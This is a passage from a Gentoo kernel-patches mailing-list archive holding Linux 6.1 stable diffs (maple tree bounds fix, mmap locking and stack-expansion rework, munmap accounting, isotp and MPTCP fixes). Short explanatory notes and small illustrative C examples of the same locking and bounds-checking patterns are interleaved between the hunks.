+ /* Look up the first VMA which satisfies  addr < vm_end,  NULL if none. */
+ extern struct vm_area_struct * find_vma(struct mm_struct * mm, unsigned long addr);
+@@ -2912,7 +2910,8 @@ unsigned long change_prot_numa(struct vm_area_struct *vma,
+ 			unsigned long start, unsigned long end);
+ #endif
+ 
+-struct vm_area_struct *find_extend_vma(struct mm_struct *, unsigned long addr);
++struct vm_area_struct *find_extend_vma_locked(struct mm_struct *,
++		unsigned long addr);
+ int remap_pfn_range(struct vm_area_struct *, unsigned long addr,
+ 			unsigned long pfn, unsigned long size, pgprot_t);
+ int remap_pfn_range_notrack(struct vm_area_struct *vma, unsigned long addr,
+@@ -3295,7 +3294,6 @@ enum mf_flags {
+ int mf_dax_kill_procs(struct address_space *mapping, pgoff_t index,
+ 		      unsigned long count, int mf_flags);
+ extern int memory_failure(unsigned long pfn, int flags);
+-extern void memory_failure_queue(unsigned long pfn, int flags);
+ extern void memory_failure_queue_kick(int cpu);
+ extern int unpoison_memory(unsigned long pfn);
+ extern int sysctl_memory_failure_early_kill;
+@@ -3304,8 +3302,12 @@ extern void shake_page(struct page *p);
+ extern atomic_long_t num_poisoned_pages __read_mostly;
+ extern int soft_offline_page(unsigned long pfn, int flags);
+ #ifdef CONFIG_MEMORY_FAILURE
++extern void memory_failure_queue(unsigned long pfn, int flags);
+ extern int __get_huge_page_for_hwpoison(unsigned long pfn, int flags);
+ #else
++static inline void memory_failure_queue(unsigned long pfn, int flags)
++{
++}
+ static inline int __get_huge_page_for_hwpoison(unsigned long pfn, int flags)
+ {
+ 	return 0;
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index b72268848ade1..2f1f661157c92 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -4281,11 +4281,13 @@ done:
+ 
+ static inline void mas_wr_end_piv(struct ma_wr_state *wr_mas)
+ {
+-	while ((wr_mas->mas->last > wr_mas->end_piv) &&
+-	       (wr_mas->offset_end < wr_mas->node_end))
+-		wr_mas->end_piv = wr_mas->pivots[++wr_mas->offset_end];
++	while ((wr_mas->offset_end < wr_mas->node_end) &&
++	       (wr_mas->mas->last > wr_mas->pivots[wr_mas->offset_end]))
++		wr_mas->offset_end++;
+ 
+-	if (wr_mas->mas->last > wr_mas->end_piv)
++	if (wr_mas->offset_end < wr_mas->node_end)
++		wr_mas->end_piv = wr_mas->pivots[wr_mas->offset_end];
++	else
+ 		wr_mas->end_piv = wr_mas->mas->max;
+ }
+ 
+@@ -4442,7 +4444,6 @@ static inline void *mas_wr_store_entry(struct ma_wr_state *wr_mas)
+ 	}
+ 
+ 	/* At this point, we are at the leaf node that needs to be altered. */
+-	wr_mas->end_piv = wr_mas->r_max;
+ 	mas_wr_end_piv(wr_mas);
+ 
+ 	if (!wr_mas->entry)
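
The maple-tree fix is a bounds-ordering correction: the old loop incremented offset_end inside the pivots[] subscript and could read one slot past node_end before the bound was tested. The corrected shape, reduced to a generic helper:

#include <stddef.h>

/* Advance off while `last` exceeds the pivot there, testing the bound
 * *before* each read; then derive the end pivot, falling back to `max`
 * when we ran off the node. Mirrors the fixed mas_wr_end_piv(). */
static unsigned long find_end_pivot(const unsigned long *pivots, size_t node_end,
				    unsigned long last, unsigned long max)
{
	size_t off = 0;

	while (off < node_end && last > pivots[off])
		off++;

	return off < node_end ? pivots[off] : max;
}

int main(void)
{
	unsigned long pivots[] = { 10, 20, 30 };

	return find_end_pivot(pivots, 3, 25, 99) == 30 ? 0 : 1;
}
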
+diff --git a/mm/Kconfig b/mm/Kconfig
+index 57e1d8c5b5052..35109a4a2f7ce 100644
+--- a/mm/Kconfig
++++ b/mm/Kconfig
+@@ -1150,6 +1150,10 @@ config LRU_GEN_STATS
+ 	  This option has a per-memcg and per-node memory overhead.
+ # }
+ 
++config LOCK_MM_AND_FIND_VMA
++	bool
++	depends on !STACK_GROWSUP
++
+ source "mm/damon/Kconfig"
+ 
+ endmenu
+diff --git a/mm/gup.c b/mm/gup.c
+index 028f3b4e8c3f2..f4911ddd30707 100644
+--- a/mm/gup.c
++++ b/mm/gup.c
+@@ -1182,7 +1182,7 @@ static long __get_user_pages(struct mm_struct *mm,
+ 
+ 		/* first iteration or cross vma bound */
+ 		if (!vma || start >= vma->vm_end) {
+-			vma = find_extend_vma(mm, start);
++			vma = vma_lookup(mm, start);
+ 			if (!vma && in_gate_area(mm, start)) {
+ 				ret = get_gate_page(mm, start & PAGE_MASK,
+ 						gup_flags, &vma,
+@@ -1351,8 +1351,8 @@ int fixup_user_fault(struct mm_struct *mm,
+ 		fault_flags |= FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_KILLABLE;
+ 
+ retry:
+-	vma = find_extend_vma(mm, address);
+-	if (!vma || address < vma->vm_start)
++	vma = vma_lookup(mm, address);
++	if (!vma)
+ 		return -EFAULT;
+ 
+ 	if (!vma_permits_fault(vma, fault_flags))
+diff --git a/mm/memory.c b/mm/memory.c
+index 747b7ea30f890..77549434d13a7 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -2843,10 +2843,16 @@ static inline int pte_unmap_same(struct vm_fault *vmf)
+ 	return same;
+ }
+ 
+-static inline bool __wp_page_copy_user(struct page *dst, struct page *src,
+-				       struct vm_fault *vmf)
++/*
++ * Return:
++ *	0:		copy succeeded
++ *	-EHWPOISON:	copy failed due to hwpoison in source page
++ *	-EAGAIN:	copy failed (some other reason)
++ */
++static inline int __wp_page_copy_user(struct page *dst, struct page *src,
++				      struct vm_fault *vmf)
+ {
+-	bool ret;
++	int ret;
+ 	void *kaddr;
+ 	void __user *uaddr;
+ 	bool locked = false;
+@@ -2855,8 +2861,11 @@ static inline bool __wp_page_copy_user(struct page *dst, struct page *src,
+ 	unsigned long addr = vmf->address;
+ 
+ 	if (likely(src)) {
+-		copy_user_highpage(dst, src, addr, vma);
+-		return true;
++		if (copy_mc_user_highpage(dst, src, addr, vma)) {
++			memory_failure_queue(page_to_pfn(src), 0);
++			return -EHWPOISON;
++		}
++		return 0;
+ 	}
+ 
+ 	/*
+@@ -2883,7 +2892,7 @@ static inline bool __wp_page_copy_user(struct page *dst, struct page *src,
+ 			 * and update local tlb only
+ 			 */
+ 			update_mmu_tlb(vma, addr, vmf->pte);
+-			ret = false;
++			ret = -EAGAIN;
+ 			goto pte_unlock;
+ 		}
+ 
+@@ -2908,7 +2917,7 @@ static inline bool __wp_page_copy_user(struct page *dst, struct page *src,
+ 		if (!likely(pte_same(*vmf->pte, vmf->orig_pte))) {
+ 			/* The PTE changed under us, update local tlb */
+ 			update_mmu_tlb(vma, addr, vmf->pte);
+-			ret = false;
++			ret = -EAGAIN;
+ 			goto pte_unlock;
+ 		}
+ 
+@@ -2927,7 +2936,7 @@ warn:
+ 		}
+ 	}
+ 
+-	ret = true;
++	ret = 0;
+ 
+ pte_unlock:
+ 	if (locked)
+@@ -3099,6 +3108,7 @@ static vm_fault_t wp_page_copy(struct vm_fault *vmf)
+ 	pte_t entry;
+ 	int page_copied = 0;
+ 	struct mmu_notifier_range range;
++	int ret;
+ 
+ 	delayacct_wpcopy_start();
+ 
+@@ -3116,19 +3126,21 @@ static vm_fault_t wp_page_copy(struct vm_fault *vmf)
+ 		if (!new_page)
+ 			goto oom;
+ 
+-		if (!__wp_page_copy_user(new_page, old_page, vmf)) {
++		ret = __wp_page_copy_user(new_page, old_page, vmf);
++		if (ret) {
+ 			/*
+ 			 * COW failed; if the fault was resolved by another,
+ 			 * it's fine. If not, userspace would re-fault on
+ 			 * the same address and we will handle the fault
+ 			 * from the second attempt.
++			 * The -EHWPOISON case will not be retried.
+ 			 */
+ 			put_page(new_page);
+ 			if (old_page)
+ 				put_page(old_page);
+ 
+ 			delayacct_wpcopy_end();
+-			return 0;
++			return ret == -EHWPOISON ? VM_FAULT_HWPOISON : 0;
+ 		}
+ 		kmsan_copy_page_meta(new_page, old_page);
+ 	}
+@@ -5246,6 +5258,125 @@ vm_fault_t handle_mm_fault(struct vm_area_struct *vma, unsigned long address,
+ }
+ EXPORT_SYMBOL_GPL(handle_mm_fault);
+ 
++#ifdef CONFIG_LOCK_MM_AND_FIND_VMA
++#include <linux/extable.h>
++
++static inline bool get_mmap_lock_carefully(struct mm_struct *mm, struct pt_regs *regs)
++{
++	/* Even if this succeeds, make it clear we *might* have slept */
++	if (likely(mmap_read_trylock(mm))) {
++		might_sleep();
++		return true;
++	}
++
++	if (regs && !user_mode(regs)) {
++		unsigned long ip = instruction_pointer(regs);
++		if (!search_exception_tables(ip))
++			return false;
++	}
++
++	return !mmap_read_lock_killable(mm);
++}
++
++static inline bool mmap_upgrade_trylock(struct mm_struct *mm)
++{
++	/*
++	 * We don't have this operation yet.
++	 *
++	 * It should be easy enough to do: it's basically an
++	 *    atomic_long_try_cmpxchg_acquire()
++	 * from RWSEM_READER_BIAS -> RWSEM_WRITER_LOCKED, but
++	 * it also needs the proper lockdep magic etc.
++	 */
++	return false;
++}
++
++static inline bool upgrade_mmap_lock_carefully(struct mm_struct *mm, struct pt_regs *regs)
++{
++	mmap_read_unlock(mm);
++	if (regs && !user_mode(regs)) {
++		unsigned long ip = instruction_pointer(regs);
++		if (!search_exception_tables(ip))
++			return false;
++	}
++	return !mmap_write_lock_killable(mm);
++}
++
++/*
++ * Helper for page fault handling.
++ *
++ * This is kind of equivalent to "mmap_read_lock()" followed
++ * by "find_extend_vma()", except it's a lot more careful about
++ * the locking (and will drop the lock on failure).
++ *
++ * For example, if we have a kernel bug that causes a page
++ * fault, we don't want to just use mmap_read_lock() to get
++ * the mm lock, because that would deadlock if the bug were
++ * to happen while we're holding the mm lock for writing.
++ *
++ * So this checks the exception tables on kernel faults in
++ * order to do all this only for instructions that are actually
++ * expected to fault.
++ *
++ * We can also actually take the mm lock for writing if we
++ * need to extend the vma, which helps the VM layer a lot.
++ */
++struct vm_area_struct *lock_mm_and_find_vma(struct mm_struct *mm,
++			unsigned long addr, struct pt_regs *regs)
++{
++	struct vm_area_struct *vma;
++
++	if (!get_mmap_lock_carefully(mm, regs))
++		return NULL;
++
++	vma = find_vma(mm, addr);
++	if (likely(vma && (vma->vm_start <= addr)))
++		return vma;
++
++	/*
++	 * Well, dang. We might still be successful, but only
++	 * if we can extend a vma to do so.
++	 */
++	if (!vma || !(vma->vm_flags & VM_GROWSDOWN)) {
++		mmap_read_unlock(mm);
++		return NULL;
++	}
++
++	/*
++	 * We can try to upgrade the mmap lock atomically,
++	 * in which case we can continue to use the vma
++	 * we already looked up.
++	 *
++	 * Otherwise we'll have to drop the mmap lock and
++	 * re-take it, and also look up the vma again,
++	 * re-checking it.
++	 */
++	if (!mmap_upgrade_trylock(mm)) {
++		if (!upgrade_mmap_lock_carefully(mm, regs))
++			return NULL;
++
++		vma = find_vma(mm, addr);
++		if (!vma)
++			goto fail;
++		if (vma->vm_start <= addr)
++			goto success;
++		if (!(vma->vm_flags & VM_GROWSDOWN))
++			goto fail;
++	}
++
++	if (expand_stack_locked(vma, addr))
++		goto fail;
++
++success:
++	mmap_write_downgrade(mm);
++	return vma;
++
++fail:
++	mmap_write_unlock(mm);
++	return NULL;
++}
++#endif
++
+ #ifndef __PAGETABLE_P4D_FOLDED
+ /*
+  * Allocate p4d page table.
+@@ -5517,6 +5648,14 @@ int __access_remote_vm(struct mm_struct *mm, unsigned long addr, void *buf,
+ 	if (mmap_read_lock_killable(mm))
+ 		return 0;
+ 
++	/* We might need to expand the stack to access it */
++	vma = vma_lookup(mm, addr);
++	if (!vma) {
++		vma = expand_stack(mm, addr);
++		if (!vma)
++			return 0;
++	}
++
+ 	/* ignore errors, just check how much was successfully transferred */
+ 	while (len) {
+ 		int bytes, ret, offset;
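
Note the discipline inside lock_mm_and_find_vma() above: because the read lock must be dropped before the write lock can be taken, the vma found earlier may be stale, so the slow path repeats find_vma() and re-checks VM_GROWSDOWN under the write lock. The same revalidate-after-reacquire rule applies to any rwlock; a compact user-space illustration (get_or_fill is an invented example, not kernel code):

#include <pthread.h>
#include <stdio.h>

static pthread_rwlock_t lock = PTHREAD_RWLOCK_INITIALIZER;
static char cached[32];

/* Returns the cached value, populating it on first use. The read lock is
 * dropped before the write lock is taken, so the miss must be re-checked
 * under the write lock -- another thread may have filled it meanwhile. */
static const char *get_or_fill(const char *fallback)
{
	pthread_rwlock_rdlock(&lock);
	if (cached[0]) {
		pthread_rwlock_unlock(&lock);
		return cached;
	}
	pthread_rwlock_unlock(&lock);	/* can't upgrade in place */

	pthread_rwlock_wrlock(&lock);
	if (!cached[0])			/* revalidate: state may have changed */
		snprintf(cached, sizeof(cached), "%s", fallback);
	pthread_rwlock_unlock(&lock);
	return cached;
}

int main(void)
{
	puts(get_or_fill("filled-once"));
	puts(get_or_fill("never-used"));
	return 0;
}
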
+diff --git a/mm/mmap.c b/mm/mmap.c
+index 14ca259189b77..b8af52db3bbe0 100644
+--- a/mm/mmap.c
++++ b/mm/mmap.c
+@@ -1945,7 +1945,7 @@ static int acct_stack_growth(struct vm_area_struct *vma,
+  * PA-RISC uses this for its stack; IA64 for its Register Backing Store.
+  * vma is the last one with address > vma->vm_end.  Have to extend vma.
+  */
+-int expand_upwards(struct vm_area_struct *vma, unsigned long address)
++static int expand_upwards(struct vm_area_struct *vma, unsigned long address)
+ {
+ 	struct mm_struct *mm = vma->vm_mm;
+ 	struct vm_area_struct *next;
+@@ -2036,6 +2036,7 @@ int expand_upwards(struct vm_area_struct *vma, unsigned long address)
+ 
+ /*
+  * vma is the first one with address < vma->vm_start.  Have to extend vma.
++ * mmap_lock held for writing.
+  */
+ int expand_downwards(struct vm_area_struct *vma, unsigned long address)
+ {
+@@ -2044,16 +2045,20 @@ int expand_downwards(struct vm_area_struct *vma, unsigned long address)
+ 	struct vm_area_struct *prev;
+ 	int error = 0;
+ 
++	if (!(vma->vm_flags & VM_GROWSDOWN))
++		return -EFAULT;
++
+ 	address &= PAGE_MASK;
+-	if (address < mmap_min_addr)
++	if (address < mmap_min_addr || address < FIRST_USER_ADDRESS)
+ 		return -EPERM;
+ 
+ 	/* Enforce stack_guard_gap */
+ 	prev = mas_prev(&mas, 0);
+ 	/* Check that both stack segments have the same anon_vma? */
+-	if (prev && !(prev->vm_flags & VM_GROWSDOWN) &&
+-			vma_is_accessible(prev)) {
+-		if (address - prev->vm_end < stack_guard_gap)
++	if (prev) {
++		if (!(prev->vm_flags & VM_GROWSDOWN) &&
++		    vma_is_accessible(prev) &&
++		    (address - prev->vm_end < stack_guard_gap))
+ 			return -ENOMEM;
+ 	}
+ 
+@@ -2132,13 +2137,12 @@ static int __init cmdline_parse_stack_guard_gap(char *p)
+ __setup("stack_guard_gap=", cmdline_parse_stack_guard_gap);
+ 
+ #ifdef CONFIG_STACK_GROWSUP
+-int expand_stack(struct vm_area_struct *vma, unsigned long address)
++int expand_stack_locked(struct vm_area_struct *vma, unsigned long address)
+ {
+ 	return expand_upwards(vma, address);
+ }
+ 
+-struct vm_area_struct *
+-find_extend_vma(struct mm_struct *mm, unsigned long addr)
++struct vm_area_struct *find_extend_vma_locked(struct mm_struct *mm, unsigned long addr)
+ {
+ 	struct vm_area_struct *vma, *prev;
+ 
+@@ -2146,20 +2150,23 @@ find_extend_vma(struct mm_struct *mm, unsigned long addr)
+ 	vma = find_vma_prev(mm, addr, &prev);
+ 	if (vma && (vma->vm_start <= addr))
+ 		return vma;
+-	if (!prev || expand_stack(prev, addr))
++	if (!prev)
++		return NULL;
++	if (expand_stack_locked(prev, addr))
+ 		return NULL;
+ 	if (prev->vm_flags & VM_LOCKED)
+ 		populate_vma_page_range(prev, addr, prev->vm_end, NULL);
+ 	return prev;
+ }
+ #else
+-int expand_stack(struct vm_area_struct *vma, unsigned long address)
++int expand_stack_locked(struct vm_area_struct *vma, unsigned long address)
+ {
++	if (unlikely(!(vma->vm_flags & VM_GROWSDOWN)))
++		return -EINVAL;
+ 	return expand_downwards(vma, address);
+ }
+ 
+-struct vm_area_struct *
+-find_extend_vma(struct mm_struct *mm, unsigned long addr)
++struct vm_area_struct *find_extend_vma_locked(struct mm_struct *mm, unsigned long addr)
+ {
+ 	struct vm_area_struct *vma;
+ 	unsigned long start;
+@@ -2170,10 +2177,8 @@ find_extend_vma(struct mm_struct *mm, unsigned long addr)
+ 		return NULL;
+ 	if (vma->vm_start <= addr)
+ 		return vma;
+-	if (!(vma->vm_flags & VM_GROWSDOWN))
+-		return NULL;
+ 	start = vma->vm_start;
+-	if (expand_stack(vma, addr))
++	if (expand_stack_locked(vma, addr))
+ 		return NULL;
+ 	if (vma->vm_flags & VM_LOCKED)
+ 		populate_vma_page_range(vma, addr, start, NULL);
+@@ -2181,7 +2186,91 @@ find_extend_vma(struct mm_struct *mm, unsigned long addr)
+ }
+ #endif
+ 
+-EXPORT_SYMBOL_GPL(find_extend_vma);
++/*
++ * IA64 has some horrid mapping rules: it can expand both up and down,
++ * but with various special rules.
++ *
++ * We'll get rid of this architecture eventually, so the ugliness is
++ * temporary.
++ */
++#ifdef CONFIG_IA64
++static inline bool vma_expand_ok(struct vm_area_struct *vma, unsigned long addr)
++{
++	return REGION_NUMBER(addr) == REGION_NUMBER(vma->vm_start) &&
++		REGION_OFFSET(addr) < RGN_MAP_LIMIT;
++}
++
++/*
++ * IA64 stacks grow down, but there's a special register backing store
++ * that can grow up. Only sequentially, though, so the new address must
++ * match vm_end.
++ */
++static inline int vma_expand_up(struct vm_area_struct *vma, unsigned long addr)
++{
++	if (!vma_expand_ok(vma, addr))
++		return -EFAULT;
++	if (vma->vm_end != (addr & PAGE_MASK))
++		return -EFAULT;
++	return expand_upwards(vma, addr);
++}
++
++static inline bool vma_expand_down(struct vm_area_struct *vma, unsigned long addr)
++{
++	if (!vma_expand_ok(vma, addr))
++		return -EFAULT;
++	return expand_downwards(vma, addr);
++}
++
++#elif defined(CONFIG_STACK_GROWSUP)
++
++#define vma_expand_up(vma,addr) expand_upwards(vma, addr)
++#define vma_expand_down(vma, addr) (-EFAULT)
++
++#else
++
++#define vma_expand_up(vma,addr) (-EFAULT)
++#define vma_expand_down(vma, addr) expand_downwards(vma, addr)
++
++#endif
++
++/*
++ * expand_stack(): legacy interface for page faulting. Don't use unless
++ * you have to.
++ *
++ * This is called with the mm locked for reading, drops the lock, takes
++ * the lock for writing, tries to look up a vma again, expands it if
++ * necessary, and downgrades the lock to reading again.
++ *
++ * If no vma is found or it can't be expanded, it returns NULL and has
++ * dropped the lock.
++ */
++struct vm_area_struct *expand_stack(struct mm_struct *mm, unsigned long addr)
++{
++	struct vm_area_struct *vma, *prev;
++
++	mmap_read_unlock(mm);
++	if (mmap_write_lock_killable(mm))
++		return NULL;
++
++	vma = find_vma_prev(mm, addr, &prev);
++	if (vma && vma->vm_start <= addr)
++		goto success;
++
++	if (prev && !vma_expand_up(prev, addr)) {
++		vma = prev;
++		goto success;
++	}
++
++	if (vma && !vma_expand_down(vma, addr))
++		goto success;
++
++	mmap_write_unlock(mm);
++	return NULL;
++
++success:
++	mmap_write_downgrade(mm);
++	return vma;
++}
+ 
+ /*
+  * Ok - we have the memory areas we should free on a maple tree so release them,
+@@ -2311,19 +2400,6 @@ int split_vma(struct mm_struct *mm, struct vm_area_struct *vma,
+ 	return __split_vma(mm, vma, addr, new_below);
+ }
+ 
+-static inline int munmap_sidetree(struct vm_area_struct *vma,
+-				   struct ma_state *mas_detach)
+-{
+-	mas_set_range(mas_detach, vma->vm_start, vma->vm_end - 1);
+-	if (mas_store_gfp(mas_detach, vma, GFP_KERNEL))
+-		return -ENOMEM;
+-
+-	if (vma->vm_flags & VM_LOCKED)
+-		vma->vm_mm->locked_vm -= vma_pages(vma);
+-
+-	return 0;
+-}
+-
+ /*
+  * do_mas_align_munmap() - munmap the aligned region from @start to @end.
+  * @mas: The maple_state, ideally set up to alter the correct tree location.
+@@ -2345,6 +2421,7 @@ do_mas_align_munmap(struct ma_state *mas, struct vm_area_struct *vma,
+ 	struct maple_tree mt_detach;
+ 	int count = 0;
+ 	int error = -ENOMEM;
++	unsigned long locked_vm = 0;
+ 	MA_STATE(mas_detach, &mt_detach, 0, 0);
+ 	mt_init_flags(&mt_detach, mas->tree->ma_flags & MT_FLAGS_LOCK_MASK);
+ 	mt_set_external_lock(&mt_detach, &mm->mmap_lock);
+@@ -2403,18 +2480,24 @@ do_mas_align_munmap(struct ma_state *mas, struct vm_area_struct *vma,
+ 
+ 			mas_set(mas, end);
+ 			split = mas_prev(mas, 0);
+-			error = munmap_sidetree(split, &mas_detach);
++			mas_set_range(&mas_detach, split->vm_start, split->vm_end - 1);
++			error = mas_store_gfp(&mas_detach, split, GFP_KERNEL);
+ 			if (error)
+-				goto munmap_sidetree_failed;
++				goto munmap_gather_failed;
++			if (next->vm_flags & VM_LOCKED)
++				locked_vm += vma_pages(split);
+ 
+ 			count++;
+ 			if (vma == next)
+ 				vma = split;
+ 			break;
+ 		}
+-		error = munmap_sidetree(next, &mas_detach);
++		mas_set_range(&mas_detach, next->vm_start, next->vm_end - 1);
++		error = mas_store_gfp(&mas_detach, next, GFP_KERNEL);
+ 		if (error)
+-			goto munmap_sidetree_failed;
++			goto munmap_gather_failed;
++		if (next->vm_flags & VM_LOCKED)
++			locked_vm += vma_pages(next);
+ 
+ 		count++;
+ #ifdef CONFIG_DEBUG_VM_MAPLE_TREE
+@@ -2463,7 +2546,10 @@ do_mas_align_munmap(struct ma_state *mas, struct vm_area_struct *vma,
+ 		mas_set_range(mas, start, end - 1);
+ 	}
+ #endif
++	/* Point of no return */
+ 	mas_store_prealloc(mas, NULL);
++
++	mm->locked_vm -= locked_vm;
+ 	mm->map_count -= count;
+ 	/*
+ 	 * Do not downgrade mmap_lock if we are next to VM_GROWSDOWN or
+@@ -2490,7 +2576,7 @@ do_mas_align_munmap(struct ma_state *mas, struct vm_area_struct *vma,
+ 	return downgrade ? 1 : 0;
+ 
+ userfaultfd_error:
+-munmap_sidetree_failed:
++munmap_gather_failed:
+ end_split_failed:
+ 	__mt_destroy(&mt_detach);
+ start_split_failed:
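
The munmap rework also changes its error-handling shape: VM_LOCKED page counts are tallied into a local locked_vm during the fallible gather loop and only applied to mm->locked_vm after mas_store_prealloc(), the commented point of no return, so a mid-loop allocation failure leaves the shared counters untouched. The gather/commit pattern in miniature (all names invented):

#include <stdbool.h>
#include <stddef.h>

struct mm { long locked_vm; long map_count; };

/* Fallible step, e.g. an allocation while gathering items to detach. */
static bool gather_one(int item, long *locked_vm)
{
	if (item < 0)
		return false;		/* failure: nothing committed yet */
	if (item & 1)			/* stands in for VM_LOCKED */
		*locked_vm += item;
	return true;
}

static bool detach_items(struct mm *mm, const int *items, size_t n)
{
	long locked_vm = 0;		/* tally side effects locally */
	size_t i;

	for (i = 0; i < n; i++)
		if (!gather_one(items[i], &locked_vm))
			return false;	/* mm->* still consistent */

	/* point of no return: apply everything at once */
	mm->locked_vm -= locked_vm;
	mm->map_count -= (long)n;
	return true;
}

int main(void)
{
	struct mm mm = { .locked_vm = 100, .map_count = 10 };
	int items[] = { 1, 2, 3 };

	return detach_items(&mm, items, 3) && mm.locked_vm == 96 ? 0 : 1;
}
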
+diff --git a/mm/nommu.c b/mm/nommu.c
+index 5b83938ecb67c..da26b3fec9ebe 100644
+--- a/mm/nommu.c
++++ b/mm/nommu.c
+@@ -682,23 +682,31 @@ struct vm_area_struct *find_vma(struct mm_struct *mm, unsigned long addr)
+ EXPORT_SYMBOL(find_vma);
+ 
+ /*
+- * find a VMA
+- * - we don't extend stack VMAs under NOMMU conditions
++ * At least xtensa ends up having protection faults even with no
++ * MMU. No stack expansion, at least.
+  */
+-struct vm_area_struct *find_extend_vma(struct mm_struct *mm, unsigned long addr)
++struct vm_area_struct *lock_mm_and_find_vma(struct mm_struct *mm,
++			unsigned long addr, struct pt_regs *regs)
+ {
+-	return find_vma(mm, addr);
++	mmap_read_lock(mm);
++	return vma_lookup(mm, addr);
+ }
+ 
+ /*
+  * expand a stack to a given address
+  * - not supported under NOMMU conditions
+  */
+-int expand_stack(struct vm_area_struct *vma, unsigned long address)
++int expand_stack_locked(struct vm_area_struct *vma, unsigned long addr)
+ {
+ 	return -ENOMEM;
+ }
+ 
++struct vm_area_struct *expand_stack(struct mm_struct *mm, unsigned long addr)
++{
++	mmap_read_unlock(mm);
++	return NULL;
++}
++
+ /*
+  * look up the first VMA that exactly matches addr
+  * - should be called with mm->mmap_lock at least held readlocked
+diff --git a/net/can/isotp.c b/net/can/isotp.c
+index 1af623839bffa..b3c2a49b189cc 100644
+--- a/net/can/isotp.c
++++ b/net/can/isotp.c
+@@ -1079,8 +1079,9 @@ wait_free_buffer:
+ 		if (err)
+ 			goto err_event_drop;
+ 
+-		if (sk->sk_err)
+-			return -sk->sk_err;
++		err = sock_error(sk);
++		if (err)
++			return err;
+ 	}
+ 
+ 	return size;
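
The isotp change matters because the open-coded `return -sk->sk_err` reads sk_err twice -- once for the test, once for the negation -- and the field can change in between, whereas sock_error() snapshots it exactly once (and clears it, so an error is consumed by a single reader). The difference, modeled with C11 atomics; the struct and helpers below are simplified stand-ins, not the real socket API:

#include <stdatomic.h>

struct sock { _Atomic int sk_err; };

/* Racy: two independent loads. sk_err can change between them, so this
 * can return 0 after the test saw an error, or a different error. */
static int sendmsg_racy(struct sock *sk)
{
	if (atomic_load(&sk->sk_err))
		return -atomic_load(&sk->sk_err);
	return 0;
}

/* Modeled on the kernel's sock_error(): one atomic snapshot that also
 * clears the pending error, so each error is reported exactly once. */
static int sock_error(struct sock *sk)
{
	int err = atomic_exchange(&sk->sk_err, 0);

	return err ? -err : 0;
}

static int sendmsg_fixed(struct sock *sk)
{
	return sock_error(sk);
}

int main(void)
{
	struct sock sk = { 5 };	/* pretend an error is pending */

	/* fixed path consumes the error; a second read then sees none */
	return sendmsg_fixed(&sk) == -5 && sendmsg_racy(&sk) == 0 ? 0 : 1;
}
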
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 01d34ee4525ea..9127a7fd5269c 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -1039,6 +1039,7 @@ static int mptcp_pm_nl_create_listen_socket(struct sock *sk,
+ 		return err;
+ 	}
+ 
++	inet_sk_state_store(newsk, TCP_LISTEN);
+ 	err = kernel_listen(ssock, backlog);
+ 	if (err) {
+ 		pr_warn("kernel_listen error, err=%d", err);
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index a2c6ce40e4269..4ca61e80f4bb2 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -2400,12 +2400,6 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		kfree_rcu(subflow, rcu);
+ 	} else {
+ 		/* otherwise tcp will dispose of the ssk and subflow ctx */
+-		if (ssk->sk_state == TCP_LISTEN) {
+-			tcp_set_state(ssk, TCP_CLOSE);
+-			mptcp_subflow_queue_clean(sk, ssk);
+-			inet_csk_listen_stop(ssk);
+-		}
+-
+ 		__tcp_close(ssk, 0);
+ 
+ 		/* close acquired an extra ref */
+@@ -2939,6 +2933,24 @@ static __poll_t mptcp_check_readable(struct mptcp_sock *msk)
+ 	return EPOLLIN | EPOLLRDNORM;
+ }
+ 
++static void mptcp_check_listen_stop(struct sock *sk)
++{
++	struct sock *ssk;
++
++	if (inet_sk_state_load(sk) != TCP_LISTEN)
++		return;
++
++	ssk = mptcp_sk(sk)->first;
++	if (WARN_ON_ONCE(!ssk || inet_sk_state_load(ssk) != TCP_LISTEN))
++		return;
++
++	lock_sock_nested(ssk, SINGLE_DEPTH_NESTING);
++	mptcp_subflow_queue_clean(sk, ssk);
++	inet_csk_listen_stop(ssk);
++	tcp_set_state(ssk, TCP_CLOSE);
++	release_sock(ssk);
++}
++
+ bool __mptcp_close(struct sock *sk, long timeout)
+ {
+ 	struct mptcp_subflow_context *subflow;
+@@ -2949,6 +2961,7 @@ bool __mptcp_close(struct sock *sk, long timeout)
+ 	WRITE_ONCE(sk->sk_shutdown, SHUTDOWN_MASK);
+ 
+ 	if ((1 << sk->sk_state) & (TCPF_LISTEN | TCPF_CLOSE)) {
++		mptcp_check_listen_stop(sk);
+ 		inet_sk_state_store(sk, TCP_CLOSE);
+ 		goto cleanup;
+ 	}
+@@ -3062,6 +3075,7 @@ static int mptcp_disconnect(struct sock *sk, int flags)
+ 	if (msk->fastopening)
+ 		return -EBUSY;
+ 
++	mptcp_check_listen_stop(sk);
+ 	inet_sk_state_store(sk, TCP_CLOSE);
+ 
+ 	mptcp_stop_timer(sk);


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-06-28 10:26 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-06-28 10:26 UTC (permalink / raw
  To: gentoo-commits

commit:     160c13fbc256840a316128f9b8601a317de1ea39
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Jun 28 10:26:02 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Jun 28 10:26:02 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=160c13fb

Linux patch 6.1.36

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |      4 +
 1035_linux-6.1.36.patch | 231726 +++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 231730 insertions(+)

diff --git a/0000_README b/0000_README
index 077b20d6..46c23470 100644
--- a/0000_README
+++ b/0000_README
@@ -183,6 +183,10 @@ Patch:  1034_linux-6.1.35.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.35
 
+Patch:  1035_linux-6.1.36.patch
+From:   https://www.kernel.org
